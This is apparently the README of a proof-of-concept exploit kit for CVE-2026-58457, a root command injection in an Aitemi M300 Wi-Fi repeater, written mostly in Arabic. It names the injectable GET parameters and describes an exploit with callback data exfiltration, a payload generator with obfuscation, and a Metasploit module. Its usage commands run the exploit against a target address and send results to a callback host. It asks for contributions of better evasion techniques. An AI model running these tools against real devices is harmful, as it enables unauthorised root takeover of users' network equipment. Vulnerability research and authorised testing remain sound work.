
PoC tools for CVE-2026-58457: Unauthenticated OS Command Injection leading to remote root on Shenzhen Aitemi M300 Wi-Fi Repeater (MT02). Includes exploit, validator, payload generator, and Metasploit module. For educational and authorized pentesting only.
[!WARNING] يُوفَّر هذا الكود كما هو (AS IS) لأغراض تعليمية وبحثية فقط. لا تستخدم هذا الـ PoC على الأنظمة الإنتاجية أو البيئات المشتركة أو أي أهداف غير مصرَّح بها.
- قد يؤدي تشغيل هذا الكود أو استضافته إلى إطلاق تنبيهات مكافحة الفيروسات أو تنبيهات مراقبة الأمان أو عواقب قانونية إذا أُسيء استخدامه.
- لا يتحمل المؤلفون والمسؤولون عن المستودع أي مسؤولية عن أي ضرر أو إساءة استخدام أو نشاط غير قانوني ناتج عن هذا الكود.
- استخدمه حصريًا في بيئات معملية معزولة وبعد الحصول على التصريح المناسب. مخصص للبحث الدفاعي وتحليل الثغرات واختبار الفريق الأزرق فقط.
توجد ثغرة حقن أوامر نظام التشغيل دون مصادقة في معالج smacfilter_conf. يتم تمرير معاملات GET التالية name وenable وmac دون تنقية إلى استدعاء sprintf() يُنشئ أوامر UCI تُنفَّذ بصلاحيات الجذر (root).
poc.py - استغلال كامل الميزات مع دعم HTTPS وإعادة المحاولة والمهلة الزمنية واستخراج البيانات عبر الاستدعاء الرجعي (callback).val.py - أداة تحقق آمنة وسلبية من الثغرة (تستخدم أمر id غير الضار).gen.py - مولّد حمولات متقدم مع تقنيات تمويه متعددة.MITIGATIONS.md - إجراءات دفاعية موصى بها.exploit/.pip install requests
python3 val.py --target 192.168.1.100
python3 poc.py --target 192.168.1.100 --cmd "id"
python3 poc.py --target 192.168.1.100 --cmd "id" --callback http://your-ip:8080/
python3 gen.py -c "id" -n 10
cp ./aitemi_m300_smacfilter_rce.rb ~/.msf4/modules/exploits/linux/http/
# or the main MSF path: /usr/share/metasploit-framework/modules/exploits/linux/http/
msfconsole -q -x "reload_all"
نرحب بالنجوم (Stars) والمساهمات - خاصة تحسينات الالتفافات أو إصدارات البرامج الثابتة الإضافية.